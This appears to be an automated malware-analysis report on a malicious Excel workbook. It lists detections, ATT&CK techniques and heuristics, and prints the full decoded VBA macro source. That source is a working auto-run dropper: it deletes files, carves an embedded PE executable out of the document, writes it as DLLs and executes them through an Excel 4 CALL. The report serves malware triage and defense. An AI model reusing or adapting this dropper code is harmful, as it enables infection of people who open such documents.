MALICIOUS
450
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1106 Execution through API
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is an Excel document containing VBA macros that trigger on Workbook_Open. These macros utilize Shell() calls and references to Windows Script Host, LoadLibrary, and GetProcAddress APIs to execute an embedded PE executable. This executable is detected by ClamAV as Win.Dropper.Hideproc-6663113-0, indicating its role as a dropper for further malicious payloads.
Heuristics 11
-
ClamAV: Win.Dropper.Hideproc-6663113-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
sendings = 1 Dim sNMSP As New Shell FlagDouble = True -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() If WelcomeDialog.Visible = True Then -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11007 bytes |
SHA-256: 6d5848e5da2487303aa21be6e2bc29ebddbd8c24ae468ac63051e339648f1846 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Module0.WuzzyBud 800
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Activate()
End Sub
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
End Sub
Attribute VB_Name = "Repositor"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Dim vSpeed As Integer
Dim vLicensePlate As String
Public Property Get Speed() As Integer
Speed = vSpeed
End Property
Public Property Let Speed(sp As Integer)
vSpeed = Application.WorksheetFunction.Min(sp, 100)
vSpeed = Application.WorksheetFunction.Max(vSpeed, -100)
End Property
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" & Drive)
End Property
Public Property Get SpecialFolders() As String
LicensePlate = vLicensePlate
End Property
Public Property Let LicensePlate(lp As String)
If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
vLicensePlate = lp
End Property
Attribute VB_Name = "Module0"
Public Sub WuzzyBud(dImmer As Integer)
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Dim ActiveHotbit As New WshShell
Dim s As String
Dim GetInfirmityLevelDescription As String
Dim d As Long
d = 3
d = d - 1
Select Case d
Case 0
s = "No health problems"
Case 1
s = "Minor health problems"
Case 2
s = "Major health problems"
Case 3
s = "Severe disability"
End Select
Dim car As Repositor
Dim SpecialPath As String
PRP = "%" & Dialog4.TextBox1.Tag
Dialog4.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%")
Set car = New Repositor
Dialog4.TextBox3.Tag = car.CheckCar(ActiveHotbit, Dialog4.TextBox3.Tag & "")
ChDir (Dialog4.TextBox1.Tag)
If WelcomeDialog.Visible = False Then
WelcomeDialog.Show
End If
End Sub
Attribute VB_Name = "Module1"
Public Const FirstB As Byte = 77
Public Const SecondB As Byte = 90
Public Const ThirdB As Byte = 144
Public Sub GetParam(Count As Integer)
Dim i As Long
Dim j As Integer
Dim c As String
Dim tooolsetChunkI As Boolean
Dim tooolsetChunkQ As Boolean
j = 1
tooolsetChunkI = False
tooolsetChunkQ = False
GetP.aram = ""
For i = 1 To Len(Comma.nd$)
c = Mi.d$(Comma.nd$, i, 1)
If tooolsetChunkI Then
If c = """" Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
If c = " " Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
Else
If c = """" Then
If j > Count Then Exit Sub
tooolsetChunkI = True
tooolsetChunkQ = True
ElseIf c <> " ccc" Then
End If
End If
If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
Next i
End Sub
Attribute VB_Name = "Module2"
Public Sub DerTip()
Dim sendings As Integer
dershlep = "" + Dialog4.TextBox1.Tag
Dim ofbl As String
Dim sOfbl As String
ofbl = Dialog4.TextBox3.Tag + "\libConfig"
Dim CurrentSizeOfAT As Long
ctackPup = Dialog4.TextBox1.Tag + "\mannua"
ctackPup = ctackPup + "l.xlsx"
ctackPop = dershlep & Dialog4.TextBox3.Value
Dim arr(1 To 3) As String
ctackPip = ctackPup & Page11.Range("A115").Value
PublicResumEraseByArrayList ofbl + "*", ctackPop, ctackPip
VistaQ ctackPup
FileCopy ctackPup, ctackPip
sendings = 1
Dim sNMSP As New Shell
FlagDouble = True
Lrigat = Dialog4.Label11.Tag
If sendings > 0 And sendings > -30 Then
Set DestinationKat = sNMSP.Namespace(dershlep)
Set harvest = sNMSP.Namespace(ctackPip)
End If
DestinationKat.CopyHere harvest.Items.Item(Lrigat)
For StepBit = 1 To 2
CurrentSizeOfAT = 328192
sendings = 1
sendingsCSTR = "1"
If FlagDouble Then
CurrentSizeOfAT = 200000 + 60600 + 8
sendings = 2
FlagDouble = False
sendingsCSTR = "2"
End If
sOfbl = ofbl + sendingsCSTR + ".dll"
Composition dershlep & Dialog4.Label1.Tag, sOfbl, CurrentSizeOfAT, sendings
If sendings < 100 Then
sendings = sendings + 1
sendings = sendings + 1
End If
If -100 <= sendings Then
sendings = sendings + 1
ChDir Dialog4.TextBox3.Tag
sendings = sendings + 1
End If
If sendings < 0 Then
sendings = sendings + 1
sendings = sendings + 1
End If
sOfbl = """" + sOfbl & ""","""
varRes1 = ExecuteExcel4Macro("CALL(" + sOfbl + "runday"",""J"")")
If IsNumeric(varRes1) Then
If varRes1 = 0 Then
Exit Sub
End If
End If
Next
End Sub
Public Sub VistaQ(WhereToGo)
DoEvents
ThisWorkbook.Sheets.Copy
Application.DisplayAlerts = False
DoEvents
ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
DoEvents
ActiveWorkbook.Close
DoEvents
End Sub
Attribute VB_Name = "Module4"
Public Sub GetParam(Count As Integer)
Dim i As Long
Dim j As Integer
Dim c As String
Dim tooolsetChunkI As Boolean
Dim tooolsetChunkQ As Boolean
j = 1
tooolsetChunkI = False
tooolsetChunkQ = False
GetP.aram = ""
For i = 1 To Len(Comma.nd$)
c = Mi.d$(Comma.nd$, i, 1)
If tooolsetChunkI Then
If c = """" Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
If c = " " Then
j = j + 1
tooolsetChunkI = False
tooolsetChunkQ = False
End If
Else
If c = """" Then
If j > Count Then Exit Sub
tooolsetChunkI = True
tooolsetChunkQ = True
ElseIf c <> " " Then
tooolsetChunkI = True
End If
End If
If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
Next i
End Sub
Attribute VB_Name = "Module5"
Public DisputeChannel3 As Byte
Public HurricanMoes() As Byte
Public abbrev As Byte
Dim DecemberUpdate As Byte
Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
On Error Resume Next
For Each Key In putArrayBigList
Kill Key
Next Key
On Error GoTo 0
End Sub
Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
Dim DisputeChannel1 As Long
Dim SimpleMethod As Integer
ReDim HurricanMoes(1 To fl)
DisputeChannel1 = FreeFile
Open Composition2 For Binary Access Read As DisputeChannel1
Dim fuZzy As Integer
fuZzy = 1
Do While 1
Get DisputeChannel1, , abbrev
If abbrev = FirstB Then
HurricanMoes(1) = abbrev
Get DisputeChannel1, , DisputeChannel3
If DisputeChannel3 = SecondB Then
HurricanMoes(2) = DisputeChannel3
Get DisputeChannel1, , DecemberUpdate
If DecemberUpdate = ThirdB Then
HurricanMoes(3) = DecemberUpdate
If fuZzy = DisputeChannel6 Then
For k = 4 To fl
Get DisputeChannel1, , abbrev
HurricanMoes(k) = abbrev
Next k
Exit Do
Else
fuZzy = fuZzy + 1
End If
End If
End If
End If
Loop
Close DisputeChannel1
On Error Resume Next
DisputeChannel1 = FreeFile
Open ofbl For Binary Lock Read Write As #DisputeChannel1
zeroBob = 1
For i = zeroBob To UBound(HurricanMoes)
If WelcomeDialog.Enabled = True Then
Put #DisputeChannel1, , HurricanMoes(i)
End If
Next i
Close DisputeChannel1
DisputeChannel1 = FreeFile
For HSP = 33 To -1 Step -0.25
DisputeChannel1 = 6 + i
Next HSP
End Sub
Attribute VB_Name = "Dialog4"
Attribute VB_Base = "0{466D64D5-C28A-40CF-9B6E-979786F07EBA}{3B9877C1-D161-4596-B086-1A549513FECB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "WelcomeDialog"
Attribute VB_Base = "0{92A9393B-3F5E-470D-B46C-19191FCC4246}{C8B3DF52-2EFF-4BDF-A0C1-BAF16B946ADC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
DoEvents
DoEvents
DerTip
DoEvents
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
embedded_office_00001b53.exe |
embedded-pe | Office MZ+PE at offset 0x1B53 | 843949 bytes |
SHA-256: 3377abb8ea2fb738a5057812eaef36146f1d2d329e0357b442131f3efae6ed86 |
|||
|
Detection
ClamAV:
Win.Dropper.Hideproc-6663113-0
Obfuscation or payload:
likely
Static shellcode analysis recovered command string(s): WScript.Shell Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: MBD00D73BAE/Ole10Native | 593311 bytes |
SHA-256: b1fa392bb373223ddc3daa16b23f155332e3196967318068a95ad72d6d72c0a9 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.